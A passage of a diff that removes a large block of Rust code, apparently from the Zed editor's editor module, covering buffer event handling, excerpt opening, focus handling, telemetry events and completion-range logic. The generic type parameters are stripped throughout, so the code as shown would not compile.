Some(current_execution_position) = current_execution_position else { - return Some(Task::ready(Ok(Vec::new()))); - }; - - // todo(debugger) when introducing multi buffer inline values check execution position's buffer id to make sure the text - // anchor is in the same buffer - let range = - buffer.read(cx).anchor_before(0)..current_execution_position.text_anchor; - project.inline_values(buffer, range, cx) - }) - .ok() - .flatten()? - .await - .context("refreshing debugger inlays") - .log_err()?; - - let (excerpt_id, buffer_id) = snapshot - .excerpts() - .next() - .map(|excerpt| (excerpt.0, excerpt.1.remote_id()))?; - editor - .update(cx, |editor, cx| { - let new_inlays = inline_values - .into_iter() - .map(|debugger_value| { - Inlay::debugger_hint( - post_inc(&mut editor.next_inlay_id), - Anchor::in_buffer(excerpt_id, buffer_id, debugger_value.position), - debugger_value.text(), - ) - }) - .collect::>(); - let mut inlay_ids = new_inlays.iter().map(|inlay| inlay.id).collect(); - std::mem::swap(&mut editor.inline_value_cache.inlays, &mut inlay_ids); - - editor.splice_inlays(&inlay_ids, new_inlays, cx); - }) - .ok()?; - Some(()) - }); - } - - fn on_buffer_event( - &mut self, - multibuffer: &Entity, - event: &multi_buffer::Event, - window: &mut Window, - cx: &mut Context, - ) { - match event { - multi_buffer::Event::Edited { - singleton_buffer_edited, - edited_buffer: buffer_edited, - } => { - self.scrollbar_marker_state.dirty = true; - self.active_indent_guides_state.dirty = true; - self.refresh_active_diagnostics(cx); - self.refresh_code_actions(window, cx); - self.refresh_selected_text_highlights(true, window, cx); - refresh_matching_bracket_highlights(self, window, cx); - if self.has_active_inline_completion() { - self.update_visible_inline_completion(window, cx); - } - if let Some(buffer) = buffer_edited { - let buffer_id = buffer.read(cx).remote_id(); - if !self.registered_buffers.contains_key(&buffer_id) { - if let Some(project) = self.project.as_ref() { - 
project.update(cx, |project, cx| { - self.registered_buffers.insert( - buffer_id, - project.register_buffer_with_language_servers(&buffer, cx), - ); - }) - } - } - } - cx.emit(EditorEvent::BufferEdited); - cx.emit(SearchEvent::MatchesInvalidated); - if *singleton_buffer_edited { - if let Some(project) = &self.project { - #[allow(clippy::mutable_key_type)] - let languages_affected = multibuffer.update(cx, |multibuffer, cx| { - multibuffer - .all_buffers() - .into_iter() - .filter_map(|buffer| { - buffer.update(cx, |buffer, cx| { - let language = buffer.language()?; - let should_discard = project.update(cx, |project, cx| { - project.is_local() - && !project.has_language_servers_for(buffer, cx) - }); - should_discard.not().then_some(language.clone()) - }) - }) - .collect::>() - }); - if !languages_affected.is_empty() { - self.refresh_inlay_hints( - InlayHintRefreshReason::BufferEdited(languages_affected), - cx, - ); - } - } - } - - let Some(project) = &self.project else { return }; - let (telemetry, is_via_ssh) = { - let project = project.read(cx); - let telemetry = project.client().telemetry().clone(); - let is_via_ssh = project.is_via_ssh(); - (telemetry, is_via_ssh) - }; - refresh_linked_ranges(self, window, cx); - telemetry.log_edit_event("editor", is_via_ssh); - } - multi_buffer::Event::ExcerptsAdded { - buffer, - predecessor, - excerpts, - } => { - self.tasks_update_task = Some(self.refresh_runnables(window, cx)); - let buffer_id = buffer.read(cx).remote_id(); - if self.buffer.read(cx).diff_for(buffer_id).is_none() { - if let Some(project) = &self.project { - get_uncommitted_diff_for_buffer( - project, - [buffer.clone()], - self.buffer.clone(), - cx, - ) - .detach(); - } - } - cx.emit(EditorEvent::ExcerptsAdded { - buffer: buffer.clone(), - predecessor: *predecessor, - excerpts: excerpts.clone(), - }); - self.refresh_inlay_hints(InlayHintRefreshReason::NewLinesShown, cx); - } - multi_buffer::Event::ExcerptsRemoved { - ids, - removed_buffer_ids, - } => { - 
self.refresh_inlay_hints(InlayHintRefreshReason::ExcerptsRemoved(ids.clone()), cx); - let buffer = self.buffer.read(cx); - self.registered_buffers - .retain(|buffer_id, _| buffer.buffer(*buffer_id).is_some()); - jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); - cx.emit(EditorEvent::ExcerptsRemoved { - ids: ids.clone(), - removed_buffer_ids: removed_buffer_ids.clone(), - }) - } - multi_buffer::Event::ExcerptsEdited { - excerpt_ids, - buffer_ids, - } => { - self.display_map.update(cx, |map, cx| { - map.unfold_buffers(buffer_ids.iter().copied(), cx) - }); - cx.emit(EditorEvent::ExcerptsEdited { - ids: excerpt_ids.clone(), - }) - } - multi_buffer::Event::ExcerptsExpanded { ids } => { - self.refresh_inlay_hints(InlayHintRefreshReason::NewLinesShown, cx); - cx.emit(EditorEvent::ExcerptsExpanded { ids: ids.clone() }) - } - multi_buffer::Event::Reparsed(buffer_id) => { - self.tasks_update_task = Some(self.refresh_runnables(window, cx)); - jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); - - cx.emit(EditorEvent::Reparsed(*buffer_id)); - } - multi_buffer::Event::DiffHunksToggled => { - self.tasks_update_task = Some(self.refresh_runnables(window, cx)); - } - multi_buffer::Event::LanguageChanged(buffer_id) => { - linked_editing_ranges::refresh_linked_ranges(self, window, cx); - jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); - cx.emit(EditorEvent::Reparsed(*buffer_id)); - cx.notify(); - } - multi_buffer::Event::DirtyChanged => cx.emit(EditorEvent::DirtyChanged), - multi_buffer::Event::Saved => cx.emit(EditorEvent::Saved), - multi_buffer::Event::FileHandleChanged - | multi_buffer::Event::Reloaded - | multi_buffer::Event::BufferDiffChanged => cx.emit(EditorEvent::TitleChanged), - multi_buffer::Event::Closed => cx.emit(EditorEvent::Closed), - multi_buffer::Event::DiagnosticsUpdated => { - self.refresh_active_diagnostics(cx); - self.refresh_inline_diagnostics(true, window, cx); - 
self.scrollbar_marker_state.dirty = true; - cx.notify(); - } - _ => {} - }; - } - - fn on_display_map_changed( - &mut self, - _: Entity, - _: &mut Window, - cx: &mut Context, - ) { - cx.notify(); - } - - fn settings_changed(&mut self, window: &mut Window, cx: &mut Context) { - self.tasks_update_task = Some(self.refresh_runnables(window, cx)); - self.update_edit_prediction_settings(cx); - self.refresh_inline_completion(true, false, window, cx); - self.refresh_inlay_hints( - InlayHintRefreshReason::SettingsChange(inlay_hint_settings( - self.selections.newest_anchor().head(), - &self.buffer.read(cx).snapshot(cx), - cx, - )), - cx, - ); - - let old_cursor_shape = self.cursor_shape; - - { - let editor_settings = EditorSettings::get_global(cx); - self.scroll_manager.vertical_scroll_margin = editor_settings.vertical_scroll_margin; - self.show_breadcrumbs = editor_settings.toolbar.breadcrumbs; - self.cursor_shape = editor_settings.cursor_shape.unwrap_or_default(); - self.hide_mouse_mode = editor_settings.hide_mouse.unwrap_or_default(); - } - - if old_cursor_shape != self.cursor_shape { - cx.emit(EditorEvent::CursorShapeChanged); - } - - let project_settings = ProjectSettings::get_global(cx); - self.serialize_dirty_buffers = project_settings.session.restore_unsaved_buffers; - - if self.mode.is_full() { - let show_inline_diagnostics = project_settings.diagnostics.inline.enabled; - let inline_blame_enabled = project_settings.git.inline_blame_enabled(); - if self.show_inline_diagnostics != show_inline_diagnostics { - self.show_inline_diagnostics = show_inline_diagnostics; - self.refresh_inline_diagnostics(false, window, cx); - } - - if self.git_blame_inline_enabled != inline_blame_enabled { - self.toggle_git_blame_inline_internal(false, window, cx); - } - } - - cx.notify(); - } - - pub fn set_searchable(&mut self, searchable: bool) { - self.searchable = searchable; - } - - pub fn searchable(&self) -> bool { - self.searchable - } - - fn open_proposed_changes_editor( - &mut 
self, - _: &OpenProposedChangesEditor, - window: &mut Window, - cx: &mut Context, - ) { - let Some(workspace) = self.workspace() else { - cx.propagate(); - return; - }; - - let selections = self.selections.all::(cx); - let multi_buffer = self.buffer.read(cx); - let multi_buffer_snapshot = multi_buffer.snapshot(cx); - let mut new_selections_by_buffer = HashMap::default(); - for selection in selections { - for (buffer, range, _) in - multi_buffer_snapshot.range_to_buffer_ranges(selection.start..selection.end) - { - let mut range = range.to_point(buffer); - range.start.column = 0; - range.end.column = buffer.line_len(range.end.row); - new_selections_by_buffer - .entry(multi_buffer.buffer(buffer.remote_id()).unwrap()) - .or_insert(Vec::new()) - .push(range) - } - } - - let proposed_changes_buffers = new_selections_by_buffer - .into_iter() - .map(|(buffer, ranges)| ProposedChangeLocation { buffer, ranges }) - .collect::>(); - let proposed_changes_editor = cx.new(|cx| { - ProposedChangesEditor::new( - "Proposed changes", - proposed_changes_buffers, - self.project.clone(), - window, - cx, - ) - }); - - window.defer(cx, move |window, cx| { - workspace.update(cx, |workspace, cx| { - workspace.active_pane().update(cx, |pane, cx| { - pane.add_item( - Box::new(proposed_changes_editor), - true, - true, - None, - window, - cx, - ); - }); - }); - }); - } - - pub fn open_excerpts_in_split( - &mut self, - _: &OpenExcerptsSplit, - window: &mut Window, - cx: &mut Context, - ) { - self.open_excerpts_common(None, true, window, cx) - } - - pub fn open_excerpts(&mut self, _: &OpenExcerpts, window: &mut Window, cx: &mut Context) { - self.open_excerpts_common(None, false, window, cx) - } - - fn open_excerpts_common( - &mut self, - jump_data: Option, - split: bool, - window: &mut Window, - cx: &mut Context, - ) { - let Some(workspace) = self.workspace() else { - cx.propagate(); - return; - }; - - if self.buffer.read(cx).is_singleton() { - cx.propagate(); - return; - } - - let mut 
new_selections_by_buffer = HashMap::default(); - match &jump_data { - Some(JumpData::MultiBufferPoint { - excerpt_id, - position, - anchor, - line_offset_from_top, - }) => { - let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); - if let Some(buffer) = multi_buffer_snapshot - .buffer_id_for_excerpt(*excerpt_id) - .and_then(|buffer_id| self.buffer.read(cx).buffer(buffer_id)) - { - let buffer_snapshot = buffer.read(cx).snapshot(); - let jump_to_point = if buffer_snapshot.can_resolve(anchor) { - language::ToPoint::to_point(anchor, &buffer_snapshot) - } else { - buffer_snapshot.clip_point(*position, Bias::Left) - }; - let jump_to_offset = buffer_snapshot.point_to_offset(jump_to_point); - new_selections_by_buffer.insert( - buffer, - ( - vec![jump_to_offset..jump_to_offset], - Some(*line_offset_from_top), - ), - ); - } - } - Some(JumpData::MultiBufferRow { - row, - line_offset_from_top, - }) => { - let point = MultiBufferPoint::new(row.0, 0); - if let Some((buffer, buffer_point, _)) = - self.buffer.read(cx).point_to_buffer_point(point, cx) - { - let buffer_offset = buffer.read(cx).point_to_offset(buffer_point); - new_selections_by_buffer - .entry(buffer) - .or_insert((Vec::new(), Some(*line_offset_from_top))) - .0 - .push(buffer_offset..buffer_offset) - } - } - None => { - let selections = self.selections.all::(cx); - let multi_buffer = self.buffer.read(cx); - for selection in selections { - for (snapshot, range, _, anchor) in multi_buffer - .snapshot(cx) - .range_to_buffer_ranges_with_deleted_hunks(selection.range()) - { - if let Some(anchor) = anchor { - // selection is in a deleted hunk - let Some(buffer_id) = anchor.buffer_id else { - continue; - }; - let Some(buffer_handle) = multi_buffer.buffer(buffer_id) else { - continue; - }; - let offset = text::ToOffset::to_offset( - &anchor.text_anchor, - &buffer_handle.read(cx).snapshot(), - ); - let range = offset..offset; - new_selections_by_buffer - .entry(buffer_handle) - .or_insert((Vec::new(), None)) - .0 - 
.push(range) - } else { - let Some(buffer_handle) = multi_buffer.buffer(snapshot.remote_id()) - else { - continue; - }; - new_selections_by_buffer - .entry(buffer_handle) - .or_insert((Vec::new(), None)) - .0 - .push(range) - } - } - } - } - } - - new_selections_by_buffer - .retain(|buffer, _| Self::can_open_excerpts_in_file(buffer.read(cx).file())); - - if new_selections_by_buffer.is_empty() { - return; - } - - // We defer the pane interaction because we ourselves are a workspace item - // and activating a new item causes the pane to call a method on us reentrantly, - // which panics if we're on the stack. - window.defer(cx, move |window, cx| { - workspace.update(cx, |workspace, cx| { - let pane = if split { - workspace.adjacent_pane(window, cx) - } else { - workspace.active_pane().clone() - }; - - for (buffer, (ranges, scroll_offset)) in new_selections_by_buffer { - let editor = buffer - .read(cx) - .file() - .is_none() - .then(|| { - // Handle file-less buffers separately: those are not really the project items, so won't have a project path or entity id, - // so `workspace.open_project_item` will never find them, always opening a new editor. - // Instead, we try to activate the existing editor in the pane first. 
- let (editor, pane_item_index) = - pane.read(cx).items().enumerate().find_map(|(i, item)| { - let editor = item.downcast::()?; - let singleton_buffer = - editor.read(cx).buffer().read(cx).as_singleton()?; - if singleton_buffer == buffer { - Some((editor, i)) - } else { - None - } - })?; - pane.update(cx, |pane, cx| { - pane.activate_item(pane_item_index, true, true, window, cx) - }); - Some(editor) - }) - .flatten() - .unwrap_or_else(|| { - workspace.open_project_item::( - pane.clone(), - buffer, - true, - true, - window, - cx, - ) - }); - - editor.update(cx, |editor, cx| { - let autoscroll = match scroll_offset { - Some(scroll_offset) => Autoscroll::top_relative(scroll_offset as usize), - None => Autoscroll::newest(), - }; - let nav_history = editor.nav_history.take(); - editor.change_selections(Some(autoscroll), window, cx, |s| { - s.select_ranges(ranges); - }); - editor.nav_history = nav_history; - }); - } - }) - }); - } - - // For now, don't allow opening excerpts in buffers that aren't backed by - // regular project files. 
- fn can_open_excerpts_in_file(file: Option<&Arc>) -> bool { - file.map_or(true, |file| project::File::from_dyn(Some(file)).is_some()) - } - - fn marked_text_ranges(&self, cx: &App) -> Option>> { - let snapshot = self.buffer.read(cx).read(cx); - let (_, ranges) = self.text_highlights::(cx)?; - Some( - ranges - .iter() - .map(move |range| { - range.start.to_offset_utf16(&snapshot)..range.end.to_offset_utf16(&snapshot) - }) - .collect(), - ) - } - - fn selection_replacement_ranges( - &self, - range: Range, - cx: &mut App, - ) -> Vec> { - let selections = self.selections.all::(cx); - let newest_selection = selections - .iter() - .max_by_key(|selection| selection.id) - .unwrap(); - let start_delta = range.start.0 as isize - newest_selection.start.0 as isize; - let end_delta = range.end.0 as isize - newest_selection.end.0 as isize; - let snapshot = self.buffer.read(cx).read(cx); - selections - .into_iter() - .map(|mut selection| { - selection.start.0 = - (selection.start.0 as isize).saturating_add(start_delta) as usize; - selection.end.0 = (selection.end.0 as isize).saturating_add(end_delta) as usize; - snapshot.clip_offset_utf16(selection.start, Bias::Left) - ..snapshot.clip_offset_utf16(selection.end, Bias::Right) - }) - .collect() - } - - fn report_editor_event( - &self, - event_type: &'static str, - file_extension: Option, - cx: &App, - ) { - if cfg!(any(test, feature = "test-support")) { - return; - } - - let Some(project) = &self.project else { return }; - - // If None, we are in a file without an extension - let file = self - .buffer - .read(cx) - .as_singleton() - .and_then(|b| b.read(cx).file()); - let file_extension = file_extension.or(file - .as_ref() - .and_then(|file| Path::new(file.file_name(cx)).extension()) - .and_then(|e| e.to_str()) - .map(|a| a.to_string())); - - let vim_mode = vim_enabled(cx); - - let edit_predictions_provider = all_language_settings(file, cx).edit_predictions.provider; - let copilot_enabled = edit_predictions_provider - == 
language::language_settings::EditPredictionProvider::Copilot; - let copilot_enabled_for_language = self - .buffer - .read(cx) - .language_settings(cx) - .show_edit_predictions; - - let project = project.read(cx); - telemetry::event!( - event_type, - file_extension, - vim_mode, - copilot_enabled, - copilot_enabled_for_language, - edit_predictions_provider, - is_via_ssh = project.is_via_ssh(), - ); - } - - /// Copy the highlighted chunks to the clipboard as JSON. The format is an array of lines, - /// with each line being an array of {text, highlight} objects. - fn copy_highlight_json( - &mut self, - _: &CopyHighlightJson, - window: &mut Window, - cx: &mut Context, - ) { - #[derive(Serialize)] - struct Chunk<'a> { - text: String, - highlight: Option<&'a str>, - } - - let snapshot = self.buffer.read(cx).snapshot(cx); - let range = self - .selected_text_range(false, window, cx) - .and_then(|selection| { - if selection.range.is_empty() { - None - } else { - Some(selection.range) - } - }) - .unwrap_or_else(|| 0..snapshot.len()); - - let chunks = snapshot.chunks(range, true); - let mut lines = Vec::new(); - let mut line: VecDeque = VecDeque::new(); - - let Some(style) = self.style.as_ref() else { - return; - }; - - for chunk in chunks { - let highlight = chunk - .syntax_highlight_id - .and_then(|id| id.name(&style.syntax)); - let mut chunk_lines = chunk.text.split('\n').peekable(); - while let Some(text) = chunk_lines.next() { - let mut merged_with_last_token = false; - if let Some(last_token) = line.back_mut() { - if last_token.highlight == highlight { - last_token.text.push_str(text); - merged_with_last_token = true; - } - } - - if !merged_with_last_token { - line.push_back(Chunk { - text: text.into(), - highlight, - }); - } - - if chunk_lines.peek().is_some() { - if line.len() > 1 && line.front().unwrap().text.is_empty() { - line.pop_front(); - } - if line.len() > 1 && line.back().unwrap().text.is_empty() { - line.pop_back(); - } - - lines.push(mem::take(&mut line)); - 
} - } - } - - let Some(lines) = serde_json::to_string_pretty(&lines).log_err() else { - return; - }; - cx.write_to_clipboard(ClipboardItem::new_string(lines)); - } - - pub fn open_context_menu( - &mut self, - _: &OpenContextMenu, - window: &mut Window, - cx: &mut Context, - ) { - self.request_autoscroll(Autoscroll::newest(), cx); - let position = self.selections.newest_display(cx).start; - mouse_context_menu::deploy_context_menu(self, None, position, window, cx); - } - - pub fn inlay_hint_cache(&self) -> &InlayHintCache { - &self.inlay_hint_cache - } - - pub fn replay_insert_event( - &mut self, - text: &str, - relative_utf16_range: Option>, - window: &mut Window, - cx: &mut Context, - ) { - if !self.input_enabled { - cx.emit(EditorEvent::InputIgnored { text: text.into() }); - return; - } - if let Some(relative_utf16_range) = relative_utf16_range { - let selections = self.selections.all::(cx); - self.change_selections(None, window, cx, |s| { - let new_ranges = selections.into_iter().map(|range| { - let start = OffsetUtf16( - range - .head() - .0 - .saturating_add_signed(relative_utf16_range.start), - ); - let end = OffsetUtf16( - range - .head() - .0 - .saturating_add_signed(relative_utf16_range.end), - ); - start..end - }); - s.select_ranges(new_ranges); - }); - } - - self.handle_input(text, window, cx); - } - - pub fn supports_inlay_hints(&self, cx: &mut App) -> bool { - let Some(provider) = self.semantics_provider.as_ref() else { - return false; - }; - - let mut supports = false; - self.buffer().update(cx, |this, cx| { - this.for_each_buffer(|buffer| { - supports |= provider.supports_inlay_hints(buffer, cx); - }); - }); - - supports - } - - pub fn is_focused(&self, window: &Window) -> bool { - self.focus_handle.is_focused(window) - } - - fn handle_focus(&mut self, window: &mut Window, cx: &mut Context) { - cx.emit(EditorEvent::Focused); - - if let Some(descendant) = self - .last_focused_descendant - .take() - .and_then(|descendant| descendant.upgrade()) - { - 
window.focus(&descendant); - } else { - if let Some(blame) = self.blame.as_ref() { - blame.update(cx, GitBlame::focus) - } - - self.blink_manager.update(cx, |blink_manager, cx| { - blink_manager.enable(cx); - }); - self.show_cursor_names(window, cx); - self.buffer.update(cx, |buffer, cx| { - buffer.finalize_last_transaction(cx); - if self.leader_peer_id.is_none() { - buffer.set_active_selections( - &self.selections.disjoint_anchors(), - self.selections.line_mode, - self.cursor_shape, - cx, - ); - } - }); - } - } - - fn handle_focus_in(&mut self, _: &mut Window, cx: &mut Context) { - cx.emit(EditorEvent::FocusedIn) - } - - fn handle_focus_out( - &mut self, - event: FocusOutEvent, - _window: &mut Window, - cx: &mut Context, - ) { - if event.blurred != self.focus_handle { - self.last_focused_descendant = Some(event.blurred); - } - self.refresh_inlay_hints(InlayHintRefreshReason::ModifiersChanged(false), cx); - } - - pub fn handle_blur(&mut self, window: &mut Window, cx: &mut Context) { - self.blink_manager.update(cx, BlinkManager::disable); - self.buffer - .update(cx, |buffer, cx| buffer.remove_active_selections(cx)); - - if let Some(blame) = self.blame.as_ref() { - blame.update(cx, GitBlame::blur) - } - if !self.hover_state.focused(window, cx) { - hide_hover(self, cx); - } - if !self - .context_menu - .borrow() - .as_ref() - .is_some_and(|context_menu| context_menu.focused(window, cx)) - { - self.hide_context_menu(window, cx); - } - self.discard_inline_completion(false, cx); - cx.emit(EditorEvent::Blurred); - cx.notify(); - } - - pub fn register_action( - &mut self, - listener: impl Fn(&A, &mut Window, &mut App) + 'static, - ) -> Subscription { - let id = self.next_editor_action_id.post_inc(); - let listener = Arc::new(listener); - self.editor_actions.borrow_mut().insert( - id, - Box::new(move |window, _| { - let listener = listener.clone(); - window.on_action(TypeId::of::(), move |action, phase, window, cx| { - let action = action.downcast_ref().unwrap(); - if phase 
== DispatchPhase::Bubble { - listener(action, window, cx) - } - }) - }), - ); - - let editor_actions = self.editor_actions.clone(); - Subscription::new(move || { - editor_actions.borrow_mut().remove(&id); - }) - } - - pub fn file_header_size(&self) -> u32 { - FILE_HEADER_HEIGHT - } - - pub fn restore( - &mut self, - revert_changes: HashMap, Rope)>>, - window: &mut Window, - cx: &mut Context, - ) { - let workspace = self.workspace(); - let project = self.project.as_ref(); - let save_tasks = self.buffer().update(cx, |multi_buffer, cx| { - let mut tasks = Vec::new(); - for (buffer_id, changes) in revert_changes { - if let Some(buffer) = multi_buffer.buffer(buffer_id) { - buffer.update(cx, |buffer, cx| { - buffer.edit( - changes - .into_iter() - .map(|(range, text)| (range, text.to_string())), - None, - cx, - ); - }); - - if let Some(project) = - project.filter(|_| multi_buffer.all_diff_hunks_expanded()) - { - project.update(cx, |project, cx| { - tasks.push((buffer.clone(), project.save_buffer(buffer, cx))); - }) - } - } - } - tasks - }); - cx.spawn_in(window, async move |_, cx| { - for (buffer, task) in save_tasks { - let result = task.await; - if result.is_err() { - let Some(path) = buffer - .read_with(cx, |buffer, cx| buffer.project_path(cx)) - .ok() - else { - continue; - }; - if let Some((workspace, path)) = workspace.as_ref().zip(path) { - let Some(task) = cx - .update_window_entity(&workspace, |workspace, window, cx| { - workspace - .open_path_preview(path, None, false, false, false, window, cx) - }) - .ok() - else { - continue; - }; - task.await.log_err(); - } - } - } - }) - .detach(); - self.change_selections(None, window, cx, |selections| selections.refresh()); - } - - pub fn to_pixel_point( - &self, - source: multi_buffer::Anchor, - editor_snapshot: &EditorSnapshot, - window: &mut Window, - ) -> Option> { - let source_point = source.to_display_point(editor_snapshot); - self.display_to_pixel_point(source_point, editor_snapshot, window) - } - - pub fn 
display_to_pixel_point( - &self, - source: DisplayPoint, - editor_snapshot: &EditorSnapshot, - window: &mut Window, - ) -> Option> { - let line_height = self.style()?.text.line_height_in_pixels(window.rem_size()); - let text_layout_details = self.text_layout_details(window); - let scroll_top = text_layout_details - .scroll_anchor - .scroll_position(editor_snapshot) - .y; - - if source.row().as_f32() < scroll_top.floor() { - return None; - } - let source_x = editor_snapshot.x_for_display_point(source, &text_layout_details); - let source_y = line_height * (source.row().as_f32() - scroll_top); - Some(gpui::Point::new(source_x, source_y)) - } - - pub fn has_visible_completions_menu(&self) -> bool { - !self.edit_prediction_preview_is_active() - && self.context_menu.borrow().as_ref().map_or(false, |menu| { - menu.visible() && matches!(menu, CodeContextMenu::Completions(_)) - }) - } - - pub fn register_addon(&mut self, instance: T) { - self.addons - .insert(std::any::TypeId::of::(), Box::new(instance)); - } - - pub fn unregister_addon(&mut self) { - self.addons.remove(&std::any::TypeId::of::()); - } - - pub fn addon(&self) -> Option<&T> { - let type_id = std::any::TypeId::of::(); - self.addons - .get(&type_id) - .and_then(|item| item.to_any().downcast_ref::()) - } - - pub fn addon_mut(&mut self) -> Option<&mut T> { - let type_id = std::any::TypeId::of::(); - self.addons - .get_mut(&type_id) - .and_then(|item| item.to_any_mut()?.downcast_mut::()) - } - - fn character_size(&self, window: &mut Window) -> gpui::Size { - let text_layout_details = self.text_layout_details(window); - let style = &text_layout_details.editor_style; - let font_id = window.text_system().resolve_font(&style.text.font()); - let font_size = style.text.font_size.to_pixels(window.rem_size()); - let line_height = style.text.line_height_in_pixels(window.rem_size()); - let em_width = window.text_system().em_width(font_id, font_size).unwrap(); - - gpui::Size::new(em_width, line_height) - } - - pub fn 
wait_for_diff_to_load(&self) -> Option>> { - self.load_diff_task.clone() - } - - fn read_metadata_from_db( - &mut self, - item_id: u64, - workspace_id: WorkspaceId, - window: &mut Window, - cx: &mut Context, - ) { - if self.is_singleton(cx) - && WorkspaceSettings::get(None, cx).restore_on_startup != RestoreOnStartupBehavior::None - { - let buffer_snapshot = OnceCell::new(); - - if let Some(folds) = DB.get_editor_folds(item_id, workspace_id).log_err() { - if !folds.is_empty() { - let snapshot = - buffer_snapshot.get_or_init(|| self.buffer.read(cx).snapshot(cx)); - self.fold_ranges( - folds - .into_iter() - .map(|(start, end)| { - snapshot.clip_offset(start, Bias::Left) - ..snapshot.clip_offset(end, Bias::Right) - }) - .collect(), - false, - window, - cx, - ); - } - } - - if let Some(selections) = DB.get_editor_selections(item_id, workspace_id).log_err() { - if !selections.is_empty() { - let snapshot = - buffer_snapshot.get_or_init(|| self.buffer.read(cx).snapshot(cx)); - self.change_selections(None, window, cx, |s| { - s.select_ranges(selections.into_iter().map(|(start, end)| { - snapshot.clip_offset(start, Bias::Left) - ..snapshot.clip_offset(end, Bias::Right) - })); - }); - } - }; - } - - self.read_scroll_position_from_db(item_id, workspace_id, window, cx); - } -} - -fn vim_enabled(cx: &App) -> bool { - cx.global::() - .raw_user_settings() - .get("vim_mode") - == Some(&serde_json::Value::Bool(true)) -} - -// Consider user intent and default settings -fn choose_completion_range( - completion: &Completion, - intent: CompletionIntent, - buffer: &Entity, - cx: &mut Context, -) -> Range { - fn should_replace( - completion: &Completion, - insert_range: &Range, - intent: CompletionIntent, - completion_mode_setting: LspInsertMode, - buffer: &Buffer, - ) -> bool { - // specific actions take precedence over settings - match intent { - CompletionIntent::CompleteWithInsert => return false, - CompletionIntent::CompleteWithReplace => return true, - CompletionIntent::Complete | 
CompletionIntent::Compose => {} - } - - match completion_mode_setting { - LspInsertMode::Insert => false, - LspInsertMode::Replace => true, - LspInsertMode::ReplaceSubsequence => { - let mut text_to_replace = buffer.chars_for_range( - buffer.anchor_before(completion.replace_range.start) - ..buffer.anchor_after(completion.replace_range.end), - ); - let mut completion_text = completion.new_text.chars(); - - // is `text_to_replace` a subsequence of `completion_text` - text_to_replace - .all(|needle_ch| completion_text.any(|haystack_ch| haystack_ch == needle_ch)) - } - LspInsertMode::ReplaceSuffix => { - let range_after_cursor = insert_range.end..completion.replace_range.end; - - let text_after_cursor = buffer - .text_for_range( - buffer.anchor_before(range_after_cursor.start) - ..buffer.anchor_after(range_after_cursor.end), - ) - .collect::(); - completion.new_text.ends_with(&text_after_cursor) - } - } - } - - let buffer = buffer.read(cx); - - if let CompletionSource::Lsp { - insert_range: Some(insert_range), - .. 
- } = &completion.source - { - let completion_mode_setting = - language_settings(cx).buffer(buffer).get() - .completions - .lsp_insert_mode; - - if !should_replace( - completion, - &insert_range, - intent, - completion_mode_setting, - buffer, - ) { - return insert_range.to_offset(buffer); - } - } - - completion.replace_range.to_offset(buffer) -} - -fn insert_extra_newline_brackets( - buffer: &MultiBufferSnapshot, - range: Range, - language: &language::LanguageScope, -) -> bool { - let leading_whitespace_len = buffer - .reversed_chars_at(range.start) - .take_while(|c| c.is_whitespace() && *c != '\n') - .map(|c| c.len_utf8()) - .sum::(); - let trailing_whitespace_len = buffer - .chars_at(range.end) - .take_while(|c| c.is_whitespace() && *c != '\n') - .map(|c| c.len_utf8()) - .sum::(); - let range = range.start - leading_whitespace_len..range.end + trailing_whitespace_len; - - language.brackets().any(|(pair, enabled)| { - let pair_start = pair.start.trim_end(); - let pair_end = pair.end.trim_start(); - - enabled - && pair.newline - && buffer.contains_str_at(range.end, pair_end) - && buffer.contains_str_at(range.start.saturating_sub(pair_start.len()), pair_start) - }) -} - -fn insert_extra_newline_tree_sitter(buffer: &MultiBufferSnapshot, range: Range) -> bool { - let (buffer, range) = match buffer.range_to_buffer_ranges(range).as_slice() { - [(buffer, range, _)] => (*buffer, range.clone()), - _ => return false, - }; - let pair = { - let mut result: Option = None; - - for pair in buffer - .all_bracket_ranges(range.clone()) - .filter(move |pair| { - pair.open_range.start <= range.start && pair.close_range.end >= range.end - }) - { - let len = pair.close_range.end - pair.open_range.start; - - if let Some(existing) = &result { - let existing_len = existing.close_range.end - existing.open_range.start; - if len > existing_len { - continue; - } - } - - result = Some(pair); - } - - result - }; - let Some(pair) = pair else { - return false; - }; - pair.newline_only - && buffer 
- .chars_for_range(pair.open_range.end..range.start) - .chain(buffer.chars_for_range(range.end..pair.close_range.start)) - .all(|c| c.is_whitespace() && c != '\n') -} - -fn get_uncommitted_diff_for_buffer( - project: &Entity, - buffers: impl IntoIterator>, - buffer: Entity, - cx: &mut App, -) -> Task<()> { - let mut tasks = Vec::new(); - project.update(cx, |project, cx| { - for buffer in buffers { - if project::File::from_dyn(buffer.read(cx).file()).is_some() { - tasks.push(project.open_uncommitted_diff(buffer.clone(), cx)) - } - } - }); - cx.spawn(async move |cx| { - let diffs = future::join_all(tasks).await; - buffer - .update(cx, |buffer, cx| { - for diff in diffs.into_iter().flatten() { - buffer.add_diff(diff, cx); - } - }) - .ok(); - }) -} - -fn char_len_with_expanded_tabs(offset: usize, text: &str, tab_size: NonZeroU32) -> usize { - let tab_size = tab_size.get() as usize; - let mut width = offset; - - for ch in text.chars() { - width += if ch == '\t' { - tab_size - (width % tab_size) - } else { - 1 - }; - } - - width - offset -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_string_size_with_expanded_tabs() { - let nz = |val| NonZeroU32::new(val).unwrap(); - assert_eq!(char_len_with_expanded_tabs(0, "", nz(4)), 0); - assert_eq!(char_len_with_expanded_tabs(0, "hello", nz(4)), 5); - assert_eq!(char_len_with_expanded_tabs(0, "\thello", nz(4)), 9); - assert_eq!(char_len_with_expanded_tabs(0, "abc\tab", nz(4)), 6); - assert_eq!(char_len_with_expanded_tabs(0, "hello\t", nz(4)), 8); - assert_eq!(char_len_with_expanded_tabs(0, "\t\t", nz(8)), 16); - assert_eq!(char_len_with_expanded_tabs(0, "x\t", nz(8)), 8); - assert_eq!(char_len_with_expanded_tabs(7, "x\t", nz(8)), 9); - } -} - -/// Tokenizes a string into runs of text that should stick together, or that is whitespace. 
